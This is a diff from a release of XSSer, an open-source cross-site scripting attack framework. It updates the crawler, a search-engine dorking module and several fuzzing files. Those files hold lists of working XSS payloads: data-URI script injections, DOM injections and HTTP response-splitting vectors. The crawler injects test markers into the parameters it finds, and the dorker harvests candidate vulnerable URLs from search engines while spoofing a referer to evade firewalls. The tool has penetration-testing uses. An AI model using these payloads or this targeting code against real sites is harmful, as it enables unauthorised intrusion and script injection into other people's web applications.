XSSer v1.8.1 - 'The Hive' release

.gitignore

@@ -1,60 +0,0 @@
-# ---> Python
-# Byte-compiled / optimized / DLL files
-__pycache__/
-*.py[cod]
-*$py.class
-
-# C extensions
-*.so
-
-# Distribution / packaging
-.Python
-env/
-build/
-develop-eggs/
-dist/
-downloads/
-eggs/
-.eggs/
-lib/
-lib64/
-parts/
-sdist/
-var/
-*.egg-info/
-.installed.cfg
-*.egg
-
-# PyInstaller
-#  Usually these files are written by a python script from a template
-#  before PyInstaller builds the exe, so as to inject date/other infos into it.
-*.manifest
-*.spec
-
-# Installer logs
-pip-log.txt
-pip-delete-this-directory.txt
-
-# Unit test / coverage reports
-htmlcov/
-.tox/
-.coverage
-.coverage.*
-.cache
-nosetests.xml
-coverage.xml
-*,cover
-
-# Translations
-*.mo
-*.pot
-
-# Django stuff:
-*.log
-
-# Sphinx documentation
-docs/_build/
-
-# PyBuilder
-target/
-

xsser/Makefile

@@ -4,7 +4,7 @@ PYTHON=`which python`
 DESTDIR=/
 BUILDIR=$(CURDIR)/debian/xsser
 PROJECT=xsser
-VERSION=0.7.0
+VERSION=1.8.1
 
 all:
 	@echo "make source - Create source package"

README.md

@@ -1,53 +0,0 @@
-  ![XSSer](https://xsser.03c8.net/xsser/zika1.png "XSSerBanner")
-
-=================================================================== 
-
- Cross Site "Scripter" (aka XSSer) is an automatic -framework- to detect, exploit and report XSS vulnerabilities.
-
-----------
-
- XSSer is released under the GPLv3. You can find the full license text
-in the [COPYING](./xsser/doc/COPYING) file.
-
-----------
-
- + Web:  https://xsser.03c8.net
-
-----------
-
-  ![XSSer](https://xsser.03c8.net/xsser/zika2.png "XSSerManifesto")
-
-#### Installing:
-
- XSSer runs on many platforms. It requires Python and the following libraries:
-
-    - python-pycurl - Python bindings to libcurl
-    - python-xmlbuilder - create xml/(x)html files - Python 2.x
-    - python-beautifulsoup - error-tolerant HTML parser for Python
-    - python-geoip - Python bindings for the GeoIP IP-to-country resolver library
-
- On Debian-based systems (ex: Ubuntu), run: 
-
-    sudo apt-get install python-pycurl python-xmlbuilder python-beautifulsoup python-geoip
-
- On other systems such as: Kali, Ubuntu, ArchLinux, ParrotSec, Fedora, etc... also run:
-
-       pip install geoip 
-
-####  Source libs:
-
-       * Python: https://www.python.org/downloads/
-       * PyCurl: http://pycurl.sourceforge.net/
-       * PyBeautifulSoup: https://pypi.python.org/pypi/BeautifulSoup
-       * PyGeoIP: https://pypi.python.org/pypi/GeoIP
-
-----------
-
-####  Screenshots:
-
-  ![XSSer](https://xsser.03c8.net/xsser/url_generation.png "XSSerSchema")
-
-  ![XSSer](https://xsser.03c8.net/xsser/zika3.png "XSSerAdvanced")
-
-  ![XSSer](https://xsser.03c8.net/xsser/zika4.png "XSSerGeoMap")
-

xsser/core/__init__.py

@@ -1,9 +1,7 @@
 """
-$Id$
+This file is part of the XSSer project, https://xsser.03c8.net
 
-This file is part of the xsser project, http://xsser.03c8.net
-
-Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
 
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free

xsser/core/crawler.py

@@ -2,11 +2,9 @@
 # -*- coding: utf-8 -*-"
 # vim: set expandtab tabstop=4 shiftwidth=4:
 """
-$Id$
+This file is part of the XSSer project, https://xsser.03c8.net
 
-This file is part of the xsser project, http://xsser.03c8.net
-
-Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
 
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
@@ -40,14 +38,10 @@ class EmergencyLanding(Exception):
 class Crawler(object):
     """
     Crawler class.
-
-    Crawls a webpage looking for url arguments.
-    Dont call from several threads! You should create a new one
-    for every thread.
     """
     def __init__(self, parent, curlwrapper=None, crawled=None, pool=None):
         # verbose: 0-no printing, 1-prints dots, 2-prints full output
-        self.verbose = 1
+        self.verbose = 0
         self._parent = parent
         self._to_crawl = []
         self._parse_external = True
@@ -81,7 +75,10 @@ class Crawler(object):
         find parameters in given url.
         """
         parsed = urllib2.urlparse.urlparse(url)
-        qs = urlparse.parse_qs(parsed.query)
+        if "C=" in parsed.query and "O=" in  parsed.query:
+            qs = ""
+        else:
+            qs = urlparse.parse_qs(parsed.query)
         if parsed.scheme:
             path = parsed.scheme + "://" + parsed.netloc + parsed.path
         else:
@@ -92,6 +89,14 @@ class Crawler(object):
             if not zipped or not path in zipped[0]:
                 self._found_args[key].append([path, url])
                 self.generate_result(arg_name, path, url)
+        if not qs:
+            parsed = urllib2.urlparse.urlparse(url)
+            if path.endswith("/"):
+                attack_url = path + "XSS"
+            else:
+                attack_url = path + "/XSS"
+            if not attack_url in self._parent.crawled_urls:
+                self._parent.crawled_urls.append(attack_url)
         ncurrent = sum(map(lambda s: len(s), self._found_args.values()))
         if ncurrent >= self._max:
             self._armed = False
@@ -121,6 +126,7 @@ class Crawler(object):
         attack_urls = []
         if not self._parent._landing and self._armed:
             self._crawl(basepath, path, depth, width)
+            # now parse all found items
             if self._ownpool:
                 self.pool.dismissWorkers(len(self.pool.workers))
                 self.pool.joinAllDismissedWorkers()
@@ -138,7 +144,7 @@ class Crawler(object):
         for key, val in qs.iteritems():
             qs_joint[key] = val[0]
         attack_qs = dict(qs_joint)
-        attack_qs[arg_name] = "VECTOR"
+        attack_qs[arg_name] = "XSS"
         attack_url = path + '?' + urllib.urlencode(attack_qs)
         if not attack_url in self._parent.crawled_urls:
             self._parent.crawled_urls.append(attack_url)
@@ -178,37 +184,35 @@ class Crawler(object):
         self._get_done(basepath, depth, width, path, res, c_info)
 
     def _get_error(self, request, error):
-        try:
-            path, depth, width, basepath = request.args[0]
-            e_type, e_value, e_tb = error
-            if e_type == pycurl.error:
-                errno, message = e_value.args
-                if errno == 28:
-                    print("requests pyerror -1")
-                    self.enqueue_jobs()
-                    self._requests.remove(path)
-                    return # timeout
-                else:
-                    self.report('crawler curl error: '+message+' ('+str(errno)+')')
-            elif e_type == EmergencyLanding:
-                pass
+        path, depth, width, basepath = request.args[0]
+        e_type, e_value, e_tb = error
+        if e_type == pycurl.error:
+            errno, message = e_value.args
+            if errno == 28:
+                print("requests pyerror -1")
+                self.enqueue_jobs()
+                self._requests.remove(path)
+                return # timeout
             else:
-                traceback.print_tb(e_tb)
-                self.report('crawler error: '+str(e_value)+' '+path)
-            if not e_type == EmergencyLanding:
-                for reporter in self._parent._reporters:
-                    reporter.mosquito_crashed(path, str(e_value))
-            self.enqueue_jobs()
-            self._requests.remove(path)
-        except:
-            return
+                self.report('crawler curl error: '+message+' ('+str(errno)+')')
+        elif e_type == EmergencyLanding:
+            pass
+        else:
+            traceback.print_tb(e_tb)
+            self.report('crawler error: '+str(e_value)+' '+path)
+        if not e_type == EmergencyLanding:
+            for reporter in self._parent._reporters:
+                reporter.mosquito_crashed(path, str(e_value))
+        self.enqueue_jobs()
+        self._requests.remove(path)
 
     def _emergency_parse(self, html_data, start=0):
         links = set()
         pos = 0
-        if not html_data:
-            return
-        data_len = len(html_data)
+        try:
+            data_len = len(html_data)
+        except:
+            data_len = html_data
         while pos < data_len:
             if len(links)+start > self._max:
                 break
@@ -236,7 +240,7 @@ class Crawler(object):
                 next_job = self._to_crawl.pop()
                 self._crawl(*next_job)
 
-    def _get_done(self, basepath, depth, width, path, html_data, content_type): # request, result):
+    def _get_done(self, basepath, depth, width, path, html_data, content_type):
         if not self._armed or len(self._parent.crawled_urls) >= self._max:
             raise EmergencyLanding
         try:
@@ -244,27 +248,23 @@ class Crawler(object):
         except:
             encoding = None
         try:
-            soup = BeautifulSoup(html_data, from_encoding=encoding)
+            soup = BeautifulSoup(html_data, fromEncoding=encoding)
             links = None
         except:
             soup = None
             links = self._emergency_parse(html_data)
-
         for reporter in self._parent._reporters:
             reporter.start_crawl(path)
-
         if not links and soup:
-            links = soup.find_all('a')
-            forms = soup.find_all('form')
-
+            links = soup.findAll('a')
+            forms = soup.findAll('form')
             for form in forms:
                 pars = {}
                 if form.has_key("action"):
                     action_path = urlparse.urljoin(path, form["action"])
                 else:
                     action_path = path
-                for input_par in form.find_all('input'):
-
+                for input_par in form.findAll('input'):
                     if not input_par.has_key("name"):
                         continue
                     value = "foo"
@@ -284,8 +284,6 @@ class Crawler(object):
         elif self.verbose:
             sys.stdout.write(".")
             sys.stdout.flush()
-        if not links:
-            return
         if len(links) > self._max:
             links = links[:self._max]
         for a in links:
@@ -323,7 +321,6 @@ class Crawler(object):
             self._find_args(href)
             for reporter in self._parent._reporters:
                 reporter.add_link(path, href)
-            self.report("\n[Info] Spidering: " + str(href))
             if self._armed and depth>0:
                 if len(self._to_crawl) < self._max:
                     self._to_crawl.append([basepath, href, depth-1, width])

xsser/core/curlcontrol.py

@@ -2,11 +2,9 @@
 # -*- coding: utf-8 -*-"
 # vim: set expandtab tabstop=4 shiftwidth=4:
 """
-$Id$
+This file is part of the XSSer project, https://xsser.03c8.net
 
-This file is part of the xsser project, http://xsser.03c8.net
-
-Copyright (c) 2011/2018 psy <epsylon@riseup.net>
+Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
 
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
@@ -469,38 +467,37 @@ class Curl:
         """
         Print selected options.
         """
-        print "\n[-]Verbose: active"
-        print "[-]Cookie:", cls.cookie
-        print "[-]HTTP User Agent:", cls.agent
-        print "[-]HTTP Referer:", cls.referer
-        print "[-]Extra HTTP Headers:", cls.headers
+        print "\nCookie:", cls.cookie
+        print "User Agent:", cls.agent
+        print "Referer:", cls.referer
+        print "Extra Headers:", cls.headers
         if cls.xforw == True:
-            print "[-]X-Forwarded-For:", "Random IP"
+            print "X-Forwarded-For:", "Random IP"
         else:
-            print "[-]X-Forwarded-For:", cls.xforw
+            print "X-Forwarded-For:", cls.xforw
         if cls.xclient == True:
-            print "[-]X-Client-IP:", "Random IP"
+            print "X-Client-IP:", "Random IP"
         else:
-            print "[-]X-Client-IP:", cls.xclient
-        print "[-]Authentication Type:", cls.atype
-        print "[-]Authentication Credentials:", cls.acred
+            print "X-Client-IP:", cls.xclient
+        print "Authentication Type:", cls.atype
+        print "Authentication Credentials:", cls.acred
         if cls.ignoreproxy == True:
-            print "[-]Proxy:", "Ignoring system default HTTP proxy"
+            print "Proxy:", "Ignoring system default HTTP proxy"
         else:
-            print "[-]Proxy:", cls.proxy
-        print "[-]Timeout:", cls.timeout
+            print "Proxy:", cls.proxy
+        print "Timeout:", cls.timeout
         if cls.tcp_nodelay == True:
-            print "[-]Delaying:", "TCP_NODELAY activate"
+            print "Delaying:", "TCP_NODELAY activate"
         else:
-            print "[-]Delaying:", cls.delay, "seconds"
+            print "Delaying:", cls.delay, "seconds"
         if cls.followred == True:
-            print "[-]Follow 302 code:", "active"
+            print "Follow 302 code:", "active"
             if cls.fli:
-                print"[-]Limit to follow:", cls.fli
+                print"Limit to follow:", cls.fli
         else:
-            print "[-]Delaying:", cls.delay, "seconds"
+            print "Delaying:", cls.delay, "seconds"
 
-        print "[-]Retries:", cls.retries, "\n"
+        print "Retries:", cls.retries, "\n"
 
     def answered(self, check):
         """

xsser/core/dork.py

@@ -2,9 +2,9 @@
 # -*- coding: utf-8 -*-"
 # vim: set expandtab tabstop=4 shiftwidth=4:
 """
-This file is part of the xsser project, https://xsser.03c8.net
+This file is part of the XSSer project, https://xsser.03c8.net
 
-Copyright (c) 2011/2016/2018 psy <epsylon@riseup.net>
+Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
 
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
@@ -22,18 +22,22 @@ Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 
 List of search engines: http://en.wikipedia.org/wiki/List_of_search_engines
 
+Currently supported: duck(default), startpage, yahoo, bing
+
 """
-import urllib2, traceback, re, random
+import urllib2, traceback, re, random, urllib
 urllib2.socket.setdefaulttimeout(5.0)
 
 DEBUG = 0
 
 class Dorker(object):
-    def __init__(self, engine='yahoo'):
+    def __init__(self, engine='duck'):
         self._engine = engine
         self.search_engines = [] # available dorking search engines
-        self.search_engines.append('bing')
+        self.search_engines.append('duck')
+        self.search_engines.append('startpage')
         self.search_engines.append('yahoo')
+        self.search_engines.append('bing')
         self.agents = [] # user-agents
         try:
             f = open("core/fuzzing/user-agents.txt").readlines() # set path for user-agents
@@ -46,35 +50,57 @@ class Dorker(object):
         """
         Perform a search and return links.
         """
-        if self._engine == 'bing': # works at 20-02-2011 -> 19-02-2016 -> 09-04-2018
-            search_url = 'https://www.bing.com/search?q="' + search + '"'
-        elif self._engine == 'yahoo': # works at 20-02-2011 -> 19-02-2016 -> -> 09-04-2018
-            search_url = 'https://search.yahoo.com/search?q="' + search + '"'
+        if self._engine == 'bing': # works at 20-02-2011 -> 19-02-2016 -> 09-04-2018 -> 26-08-2019
+            search_url = 'https://www.bing.com/search?q="' + str(search) + '"'
+            print "\nSearching query:", urllib2.unquote(search_url)
+        elif self._engine == 'yahoo': # works at 20-02-2011 -> 19-02-2016 -> -> 09-04-2018 -> 26-08-2019
+            search_url = 'https://search.yahoo.com/search?q="' + str(search) + '"'
+            print "\nSearching query:", urllib2.unquote(search_url)
+        elif self._engine == 'duck': # works at 26-08-2019
+            search_url = 'https://duckduckgo.com/html/' 
+            q = 'instreamset:(url):"' + str(search) + '"' # set query to search literally on results
+            query_string = { 'q':q }
+            print "\nSearching query:", urllib2.unquote(search_url) + " [POST: (" + q + ")]"
+        elif self._engine == 'startpage': # works at 26-08-2019
+            search_url = 'https://www.startpage.com/do/asearch'
+            q = 'url:"' + str(search) + '"' # set query to search literally on results
+            query_string = { 'cmd':'process_search', 'query':q }
+            print "\nSearching query:", urllib2.unquote(search_url) + " [POST: (" + q + ")]"
         else:
-            print "\n[Error] This search engine is not supported!\n" 
-            print "[Info] List of available:"
-            print '-'*25
+            print "\n[Error] This search engine is not being supported!\n"
+            print '-'*25 
+            print "\n[Info] Use one from this list:\n"
             for e in self.search_engines:
                 print "+ "+e
-            print ""
+            print "\n ex: xsser -d 'profile.asp?num=' --De 'duck'"
+            print " ex: xsser -l --De 'startpage'"
+            print "\n[Info] Or try them all:\n\n ex: xsser -d 'news.php?id=' --Da\n"
         try:
             self.search_url = search_url
-            print "\n[Info] Search query:", urllib2.unquote(search_url)
             user_agent = random.choice(self.agents).strip() # set random user-agent
             referer = '127.0.0.1' # set referer to localhost / WAF black magic!
             headers = {'User-Agent' : user_agent, 'Referer' : referer}
-            req = urllib2.Request(search_url, None, headers)
+            if self._engine == 'bing' or self._engine == 'yahoo': # using GET
+                req = urllib2.Request(search_url, None, headers)
+            elif self._engine == 'duck' or self._engine == 'startpage': # using POST
+                data = urllib.urlencode(query_string)
+                req = urllib2.Request(search_url, data, headers)
             html_data = urllib2.urlopen(req).read()
             print "\n[Info] Retrieving requested info..."
         except urllib2.URLError, e:
             if DEBUG:
                 traceback.print_exc()
             print "\n[Error] Cannot connect!"
+            print "\n" + "-"*50
             return
         if self._engine == 'bing':
-            regex = '<h2><a href="(.+?)" h=' # regex magics 09-04/2018
+            regex = '<h2><a href="(.+?)" h=' # regex magics 08/2019
         if self._engine == 'yahoo':
-            regex = 'RU=(.+?)/RK=' # regex magics [09/04/2018]
+            regex = 'RU=(.+?)/RK=' # regex magics 08/2019
+        if self._engine == 'duck':
+            regex = '<a class="result__url" href="(.+?)">' # regex 08/2019
+        if self._engine == 'startpage':
+            regex = 'target="_blank">(.+?)</a>' # regex magics 08/2019
         pattern = re.compile(regex)
         links = re.findall(pattern, html_data)
         found_links = []
@@ -90,14 +116,14 @@ class Dorker(object):
                     if link2 not in found_links: # parse that target is not duplicated
                         found_links.append(link)
         else:
-            print "\n[Info] Not any link found for that query!"
+            print "\n[Error] Not any link found for that query!"
         return found_links
 
 if __name__ == '__main__':
-    for a in ['yahoo', 'bing']:
+    for a in ['bing', 'yahoo', 'duck', 'startpage']: # working at: 28/08/2019
         dork = Dorker(a)
         res = dork.dork("news.php?id=")
         if res:
-            print "[+]", a, ":", len(res), "\n"
+            print "\n[+] Search Engine:", a, "| Found: ", len(res), "\n"
             for b in res:
                 print " *", b

xsser/core/encdec.py

@@ -2,11 +2,9 @@
 # -*- coding: utf-8 -*-"
 # vim: set expandtab tabstop=4 shiftwidth=4:
 """
-$Id$
+This file is part of the XSSer project, https://xsser.03c8.net
 
-This file is part of the xsser project, http://xsser.03c8.net
-
-Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
 
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
@@ -102,7 +100,7 @@ class EncoderDecoder(object):
     def _ipOctalEncode(self, string):
         """
         Encode to octal.
-	"""
+    	"""
         encoded=''
         tblIP = string.split('.')
         # In the case it's not an IP

xsser/core/flashxss.py

@@ -2,11 +2,9 @@
 # -*- coding: utf-8 -*-"
 # vim: set expandtab tabstop=4 shiftwidth=4:
 """
-$Id$
+This file is part of the XSSer project, https://xsser.03c8.net
 
-This file is part of the xsser project, http://xsser.03c8.net
-
-Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
 
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
@@ -30,8 +28,8 @@ class FlashInjections(object):
 
     def flash_xss(self, filename, payload):
         """
-        Create -fake- flash movie (.swf) with code XSS injected.
-	"""
+        Create -fake- flash movie (.swf) with XSS codeinjected.
+	    """
         root, ext = os.path.splitext(filename)
         if ext.lower() in [".swf"]:
             f = open(filename, 'wb')
@@ -42,9 +40,9 @@ class FlashInjections(object):
                 content = user_payload
             f.write(content)
             f.close()
-            flash_results = "\nCode: "+ content + "\nFile: ", root + ext
+            flash_results = "\n[Info] XSS Vector: \n\n "+ content + "\n\n[Info] File: \n\n ", root + ext + "\n"
         else:
-            flash_results = "\nPlease select a filename with extension .swf"
+            flash_results = "\n[Error] Supported extensions = .swf\n"
         return flash_results
 
 if __name__ == '__main__':

core/fuzzing/DCP.py

@@ -0,0 +1,59 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-"
+# vim: set expandtab tabstop=4 shiftwidth=4:
+"""
+This file is part of the XSSer project, https://xsser.03c8.net
+
+Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
+
+xsser is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation version 3 of the License.
+
+xsser is distributed in the hope that it will be useful, but WITHOUT ANY
+WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along
+with xsser; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+## This file contains different XSS fuzzing vectors.
+## If you have some new, please email me to [epsylon@riseup.net]
+## Happy Cross Hacking! ;)
+
+DCPvectors = [
+		{ 'payload' : """<a href="data:text/html;base64,[B64]%3cscript%3ealert("PAYLOAD");history.back();%3c/script%3e"></a>[B64]""",
+          'browser' : """[Data Control Protocol Injection]"""},
+		{ 'payload' : """<iframe src="data:text/html;base64,[B64]%3cscript%3ealert("PAYLOAD");history.back();%3c/script%3e"></[B64]""",
+		  'browser' : """[Data Control Protocol Injection]"""},	
+		{ 'payload' : """0?<script>Worker("#").onmessage=function(_)eval(_.data)</script> :postMessage(importScripts('data:;base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]'))""",
+		  'browser' : """[Data Control Protocol Injection]"""},
+		{ 'payload' : """<a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]"&#09;&#10;&#11;>Y</a""",
+		  'browser' : """[Data Control Protocol Injection]"""},
+		{ 'payload' : """<EMBED SRC="data:image/svg+xml;base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]" type="image/svg+xml" AllowScriptAccess="always"></EMBED>""",
+		  'browser' : """[Data Control Protocol Injection]"""},
+		{ 'payload' : """<embed src="data:text/html;base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]"></embed>""",
+		  'browser' : """[Data Control Protocol Injection]"""},
+		{ 'payload' : """<iframe/src="data:text/html;&Tab;base64&Tab;,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]">""",
+		  'browser' : """[Data Control Protocol Injection]"""},
+		{ 'payload' : """<META HTTP-EQUIV="refresh" CONTENT="0;url=data:image/svg+xml; base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]">""",
+		  'browser' : """[Data Control Protocol Injection]"""},
+		{ 'payload' : """"><META HTTP-EQUIV="refresh" CONTENT="0;url=data:image/svg+xml; base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]">""",
+		  'browser' : """[Data Control Protocol Injection]"""},
+		{ 'payload' : """<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html; base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]">""",
+		  'browser' : """[Data Control Protocol Injection]"""},
+		{ 'payload' : """<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]">""",
+		  'browser' : """[Data Control Protocol Injection]"""},
+		{ 'payload' : """"><META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html; base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]">""",
+		  'browser' : """[Data Control Protocol Injection]"""},
+		{ 'payload' : """<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]">""",
+		  'browser' : """[Data Control Protocol Injection]"""},
+		{ 'payload' : """<object data="data:text/html;base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]"></object>""",
+		  'browser' : """[Data Control Protocol Injection]"""},
+		{ 'payload' : """<object data=data:text/html;base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]></object>​""",
+		  'browser' : """[Data Control Protocol Injection]"""},
+		{ 'payload' : """data:image/svg+xml;base64,[B64]<svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.0" x="0" y="0" width="194" height="200" id="Y"><script type="text/ecmascript">alert("PAYLOAD");</script></svg>[B64]""",
+          'browser' : """[Data Control Protocol Injection]""" }
+		]

xsser/core/fuzzing/DOM.py

@@ -2,11 +2,9 @@
 # -*- coding: utf-8 -*-"
 # vim: set expandtab tabstop=4 shiftwidth=4:
 """
-$Id$
+This file is part of the XSSer project, https://xsser.03c8.net
 
-This file is part of the xsser project, http://xsser.03c8.net
-
-Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
 
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
@@ -26,19 +24,14 @@ Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 ## Happy Cross Hacking! ;)
 
 DOMvectors = [
-		{ 'payload' : """?notname=PAYLOAD""",
-		  'browser' : """[Document Object Model Injection]"""},
-		  
 		{ 'payload' : """?notname=PAYLOAD&""",
 		  'browser' : """[Document Object Model Injection]"""},
-
 		{ 'payload':'''<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="PAYLOAD" style="behavior:url(#x);"><param name=postdomevents /></object>''',
 		  'browser' : """[Document Object Model Injection]"""},
-
 		{ 'payload' : """?<script>history.pushState(0,0,'PAYLOAD');</script>""",
 		  'browser' : """[Document Object Model Injection]"""},
-		  
+		{ 'payload' : """?name=Y%0d%0a%0d%0aPAYLOAD""",
+		  'browser' : """[Document Object Model Injection]"""}, 
 		{ 'payload' : """?foobar=name=PAYLOAD&""",
 		  'browser' : """[Document Object Model Injection]"""}
 		]
-

xsser/core/fuzzing/HTTPsr.py

@@ -2,11 +2,9 @@
 # -*- coding: utf-8 -*-"
 # vim: set expandtab tabstop=4 shiftwidth=4:
 """
-$Id$
+This file is part of the XSSer project, https://xsser.03c8.net
 
-This file is part of the xsser project, http://xsser.03c8.net
-
-Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
 
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
@@ -26,41 +24,26 @@ Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 ## Happy Cross Hacking! ;)
 
 HTTPrs_vectors = [
-		{ 'payload' : """%0d%0AContent-Length:%200%0d%0A%0d%0AHTTP/1.1%20200%20OK%0d%0AContent-Length:%2016%0d%0A%0d%0A&lt;html&gt;XSS&lt;/html&gt;
-			""",
-                  'browser' : """[Induced Injection]""" },
-
-		{ 'payload' : """XSS%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2029%0d%0a%0d%0a<script>alert("XSS")</script>""",
-                  'browser' : """[Induced Injection]""" },
-
-		{ 'payload' : """%0D%0ASet-Cookie%3AXSS""",
-                  'browser' : """[Induced Injection]""" },
-
-		{ 'payload' : """%0AContent-Type:html%0A%0A%3Cbody%20onload=alert(%22XSS%22)%3E""",
-                  'browser' : """[Induced Injection]""" },
-
-		{ 'payload' : """%0AContent-Type:text/html%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3Ehttp://www.test.com""",
-                  'browser' : """[Induced Injection]""" },
-
-		{ 'payload' : """%0AContent-type:%20html%0A%0Ahttp://www.test.com/%3Cscript%3Ealert(%22XSS%22)%3C/script%3E""",
-                  'browser' : """[Induced Injection]""" },
-
-		{ 'payload' : """%0AExpect:%20%3Cscript%3Ealert(%22XSS%22)%3C/script%3E""",
-                  'browser' : """[Induced Injection]""" },
-
-		{ 'payload' : """%0d%0aContent-Type: text/html%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aLast-Modified: Wed, 13 Jan 2006 12:44:23 GMT%0d%0aContent-Type:text/html%0d%0a%0d%0a<html>XSS</html>%20HTTP/1.1""",
+		{ 'payload' : """%0d%0AContent-Length:%200%0d%0A%0d%0AHTTP/1.1%20200%20OK%0d%0AContent-Length:%2016%0d%0A%0d%0A&lt;html&gt;PAYLOAD&lt;/html&gt;""",
+          'browser' : """[Induced Injection]""" },
+		{ 'payload' : """PAYLOAD%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2029%0d%0a%0d%0a<script>alert("PAYLOAD")</script>""",
+          'browser' : """[Induced Injection]""" },
+		{ 'payload' : """%0D%0ASet-Cookie%3APAYLOAD""",
+          'browser' : """[Induced Injection]""" },
+		{ 'payload' : """%0AContent-Type:html%0A%0A%3Cbody%20onload=alert(%22PAYLOAD%22)%3E""",
+          'browser' : """[Induced Injection]""" },
+		{ 'payload' : """%0AContent-Type:text/html%0A%0A%3Cscript%3Ealert(%22PAYLOAD%22)%3C/script%3Ehttp://www.test.com""",
+          'browser' : """[Induced Injection]""" },
+		{ 'payload' : """%0AContent-type:%20html%0A%0Ahttp://www.test.com/%3Cscript%3Ealert(%22PAYLOAD%22)%3C/script%3E""",
+          'browser' : """[Induced Injection]""" },
+		{ 'payload' : """%0AExpect:%20%3Cscript%3Ealert(%22PAYLOAD%22)%3C/script%3E""",
+          'browser' : """[Induced Injection]""" },
+		{ 'payload' : """%0d%0aContent-Type: text/html%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aLast-Modified: Wed, 13 Jan 2006 12:44:23 GMT%0d%0aContent-Type:text/html%0d%0a%0d%0a<html>PAYLOAD</html>%20HTTP/1.1""",
 		  'browser' : """[Induced Injection]"""},
-				
-		{ 'payload' : """%0d%0aContent-Type: text/html%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aCache-Control: no-cache%0d%0aContent-Type: text/html%0d%0a%0d%0a<html>XSS</html>%20HTTP/1.1
-			""",
-                  'browser' : """[Induced Injection]"""},
-
-		{ 'payload' : """%0d%0aContent-Type: text/html%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aPragma:no-cache%0d%0aContent-Type: text/html%0d%0a%0d%0a<html>XSS</html>%20HTTP/1.1
-			""",
+		{ 'payload' : """%0d%0aContent-Type: text/html%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aCache-Control: no-cache%0d%0aContent-Type: text/html%0d%0a%0d%0a<html>PAYLOAD</html>%20HTTP/1.1""",
+          'browser' : """[Induced Injection]"""},
+		{ 'payload' : """%0d%0aContent-Type: text/html%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aPragma:no-cache%0d%0aContent-Type: text/html%0d%0a%0d%0a<html>PAYLOAD</html>%20HTTP/1.1""",
 		  'browser' : """[Induced Injection]""" },
-
-		{ 'payload' : """%0d%0AContent-Type: text/html;charset=UTF-7%0A%0A%2BADw-script%2BAD4-alert('%58%53%53');%2BADw-/script%2BAD4-
-			""",
-                  'browser' : """[Induced Injection]""" }
+		{ 'payload' : """%0d%0AContent-Type: text/html;charset=UTF-7%0A%0A%2BADw-script%2BAD4-alert('PAYLOAD');%2BADw-/script%2BAD4-""",
+          'browser' : """[Induced Injection]""" }
 		]
-

xsser/core/fuzzing/__init__.py

@@ -1,9 +1,7 @@
 """
-$Id$
+This file is part of the XSSer project, https://xsser.03c8.net
 
-This file is part of the xsser project, http://xsser.03c8.net
-
